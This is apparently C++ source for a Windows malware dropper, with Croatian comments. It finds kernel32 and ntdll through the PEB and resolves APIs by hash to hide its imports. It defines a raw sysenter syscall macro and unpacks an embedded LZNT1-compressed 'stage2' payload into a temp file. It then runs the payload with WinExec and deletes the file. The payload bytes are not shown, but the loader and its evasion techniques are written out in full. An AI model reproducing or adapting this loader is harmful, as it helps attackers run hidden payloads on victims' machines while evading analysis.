#include "stdafx.h"											// precompiled headeri koje generira AppWizard
#include <iostream>
#include <windows.h>

// ovdje je spremljen niz sa stage2 CHAR dumpom
#include "stage2.h"

// ovdje su neke klasicne strukutre da ustedimo malo prostora :>
#include "ntutils.h"

// ovdje su deklaracije fja te inline asm implementacije nativnih fja.
#include "importi.h"

using namespace std;

#define NtMapViewOfSection_No	0x6c		// 10 parametara


//
// Nece preko makroa da ga jebes! :/
//

#define SYSENTER ( a, b ) {														\
	__asm {																		\
				call	$+26													\
				mov		eax, (a)												\
				mov		edx, esp												\
				call	$+5														\
				pop		ecx														\
				mov		word ptr [ecx+7], 340Fh									\
				push	0														\
				call	$-21													\
				add		esp, (b*4) + 4											\
	}																			\
}

//
// Uzima bazu kernel32.dll iz PEB bloka.
//

__forceinline HMODULE UzmiBazuKernel32()
{
	HMODULE baza;

	__asm {
		mov		eax, dword ptr fs:[30h]
        mov		eax, dword ptr [eax+0ch]
        mov		eax, dword ptr [eax+1ch]
		mov		eax, [eax]
		mov		eax, dword ptr [eax+08h]
		mov		baza, eax
	}

	return ( baza );
}

//
// Uzima bazu ntdll.dll iz PEB bloka.
//

__forceinline HMODULE UzmiBazuNtdll()
{
	HMODULE baza;

	__asm {
		mov		eax, dword ptr fs:[30h]
		mov		eax, [eax+0ch]
		mov		eax, [eax+1ch]
		mov		eax, [eax+8]
		mov		baza, eax
	}
	return ( baza );
}

DWORD GetHash(LPSTR str)
{
	DWORD h = 0;						// hash algo (x) by z0mbie

	while ( *str ) {
		h = (h << 7) | (h >> 25);		// rol h, 7 u asmu, C sux.
		h ^= (BYTE) *str++;
	}
	return (h);
}


PVOID MojGetProc(PVOID Baza, DWORD hash)
{
	// uzmi ptr na DOS MZ zaglavlje
	PIMAGE_DOS_HEADER mz_zaglavlje = PIMAGE_DOS_HEADER(Baza);
	
	// uzmi ptr na NT zaglavlje
	PIMAGE_NT_HEADERS nt_zaglavlje = PIMAGE_NT_HEADERS(LPSTR(Baza) + mz_zaglavlje->e_lfanew);

	// dodji do clana niza DataDirectory koji odgovara exportima (nulti clan inace)
	PIMAGE_DATA_DIRECTORY export_direktorij = nt_zaglavlje->OptionalHeader.DataDirectory + IMAGE_DIRECTORY_ENTRY_EXPORT;
	
	// uzmi informacije o tom direktoriju, velicinu i RVA na koju je mapiran
	ULONG velicina = export_direktorij->Size;
	ULONG adresa = export_direktorij->VirtualAddress;
	
	// normaliziraj adresu
	PIMAGE_EXPORT_DIRECTORY exporti = PIMAGE_EXPORT_DIRECTORY(PCHAR(Baza) + adresa);
	
	PULONG funkcije = PULONG(PCHAR(Baza) + exporti->AddressOfFunctions);
	PSHORT redni_brojevi = PSHORT(PCHAR(Baza) + exporti->AddressOfNameOrdinals);
	PULONG imena_fja = PULONG(PCHAR(Baza) + exporti->AddressOfNames);

	PVOID adresa_apija = 0;

	for (ULONG i = 0; i < exporti->NumberOfNames; i++) {

		// iteriraj za svako ime exportanog API-ja
		ULONG redni_broj = redni_brojevi[i];

		if (funkcije[redni_broj] < adresa || funkcije[redni_broj] >= adresa + velicina) {

			// ako smo pronasli API koji trazimo po imenu, uzmi njegov RVA i normaliziraj ga.
			if (GetHash(LPSTR(PCHAR(Baza) + imena_fja[i])) == hash)
				adresa_apija = PCHAR(Baza) + funkcije[redni_broj];
		}
	}
	return adresa_apija;
}

//
// Trazi adrese fja u ntdll.dll, te vraca FALSE ukoliko se bar jedna od njih nije mogla naci.
//

BOOLEAN LocirajNTDLLFje()
{
	if ( !(RtlDecompressBuffer = (NTSTATUS (__stdcall *)(USHORT,PUCHAR,ULONG,PUCHAR,ULONG,PULONG))
									  MojGetProc( UzmiBazuNtdll(), 0x9daf495f )) ) {
		return (FALSE);
	}

	if ( !(fCreateFileA = (HANDLE (__stdcall *)(LPCSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE))
									  MojGetProc( UzmiBazuKernel32(), 0x08f8f114 )) ) {
		return (FALSE);
	}

	if ( !(fSetFilePointer = (DWORD (__stdcall *)(HANDLE,LONG,PLONG,DWORD))
									  MojGetProc( UzmiBazuKernel32(), 0xef48e03a )) ) {
		return (FALSE);
	}

	if ( !(fSetEndOfFile = (BOOL (__stdcall *)(HANDLE))
									  MojGetProc( UzmiBazuKernel32(), 0x2d0d9d61 )) ) {
		return (FALSE);
	}

	if ( !(fWinExec = (UINT (__stdcall *)(LPCSTR,UINT))
									  MojGetProc( UzmiBazuKernel32(), 0xe8bf6dad )) ) {
		return (FALSE);
	}

	if ( !(fGetTempFileNameA = (UINT (__stdcall *)(LPCSTR,LPCSTR,UINT,LPSTR))
									  MojGetProc( UzmiBazuKernel32(), 0x0fa4f502 )) ) {
		return (FALSE);
	}

	if ( !(fGetTempPathA = (DWORD (__stdcall *)(DWORD,LPSTR))
									  MojGetProc( UzmiBazuKernel32(), 0x58fe7abe )) ) {
		return (FALSE);
	}

	if ( !(fGetFileSize = (DWORD (__stdcall *)(HANDLE,LPDWORD))
									  MojGetProc( UzmiBazuKernel32(), 0xaef7cbf1 )) ) {
		return (FALSE);
	}

	if ( !(fDeleteFileA = (BOOL (__stdcall *)(LPCSTR))
									  MojGetProc( UzmiBazuKernel32(), 0x81f0f0df )) ) {
		return (FALSE);
	}
		
	else return (TRUE);
}

//
// Otvara i mapira specificiranu datoteku u memoriju.
//

BOOLEAN MapirajDatoteku( LPSTR ime, DWORD velicina, PHANDLE hFile, PHANDLE hMem, PVOID *pBaznaAdresa )
{
	NTSTATUS status;
	LARGE_INTEGER secSize;
	HANDLE Handle = NULL;

	*hFile = fCreateFileA( ime, 
						 GENERIC_READ | GENERIC_WRITE,
						 FILE_SHARE_READ | FILE_SHARE_WRITE,
						 NULL, 
						 OPEN_ALWAYS,
						 0,
						 NULL );

	if ( *hFile == INVALID_HANDLE_VALUE ) {
		return (FALSE);
	}

	if ( velicina == 0 ) {
		velicina = fGetFileSize( *hFile, NULL ); 
	}

	secSize.QuadPart = velicina;

	status = NtCreateSection( hMem, 
						      SECTION_ALL_ACCESS,
							  NULL,
							  &secSize,
							  PAGE_READWRITE,
							  SEC_COMMIT,
							  *hFile );

	if ( status != STATUS_SUCCESS ) {
		NtClose( hFile );
		return ( FALSE );
	}

	*(DWORD*)pBaznaAdresa = NULL;								// da ne bi Mm pomislio da treba mapirati neku nasu adresu..

	status = NtMapViewOfSection ( *hMem,
								  HANDLE (-1),					// trenutni proces
								  pBaznaAdresa,
								  0,
								  velicina,
								  NULL,
								  &velicina,
								  ViewShare,
								  0,
								  PAGE_READWRITE );

	if ( status != STATUS_SUCCESS ) {
		NtClose( hMem );
		NtClose( hFile );
		return ( FALSE );
	}

	return ( TRUE );
}

//
// Dekompresira specificirani buffer te ga sprema u specificiranu datoteku.
//
BOOLEAN Dekompresiraj( USHORT CompressionEngine, PVOID KompresiraniBuffer, DWORD KompresiranaVelicina, DWORD* KonacnaVelicina,
					  char* ime )
{
	DWORD		NekompresiranaVelicina = DWORD( KompresiranaVelicina * 12.5 );		// max. moguca kompresija (92%)
	LPVOID		NekompresiranBuffer = NULL;
	NTSTATUS	status;
	HANDLE		hFile;
	HANDLE		hMem;
	LPVOID		BaznaAdresa = NULL;

	status = MapirajDatoteku( ime, NekompresiranaVelicina, &hFile, &hMem, &BaznaAdresa );

	_ASSERTE ( status == TRUE );

	status = RtlDecompressBuffer( CompressionEngine,
								  (PUCHAR)BaznaAdresa,
								  NekompresiranaVelicina,
								  (PUCHAR)KompresiraniBuffer,
								  KompresiranaVelicina,
								  KonacnaVelicina );

	_ASSERTE ( status == STATUS_SUCCESS );
	
	status = NtUnmapViewOfSection( (HANDLE)-1, BaznaAdresa );

	_ASSERTE ( status == STATUS_SUCCESS );

	NtClose( hMem );
	fSetFilePointer( hFile, *KonacnaVelicina, 0, 0 );
	fSetEndOfFile( hFile );
	NtClose( hFile );
	
	return (TRUE);
}

int WINAPI WinMain(
	IN HINSTANCE hInstance,
    IN HINSTANCE hPrevInstance,
    IN LPSTR lpCmdLine,
    IN int nShowCmd
    )
{
	DWORD			konacna_velicina;
	CHAR			tempf[MAX_PATH];
	CHAR			tempp[MAX_PATH];

	if ( !LocirajNTDLLFje() ) {
		exit(1);
	}
	
	// Alociraj privremeno ime datoteke u trenutnom direktoriju

	fGetTempPathA(MAX_PATH, tempp);
	fGetTempFileNameA( tempp, " #_", 0, tempf );

	Dekompresiraj( COMPRESSION_FORMAT_LZNT1, (PUCHAR)pakirana_datoteka, pakirana_datoteka_size, &konacna_velicina, tempf );
	fWinExec(tempf, SW_SHOWDEFAULT);

	fDeleteFileA( tempf );

	return (0);
}

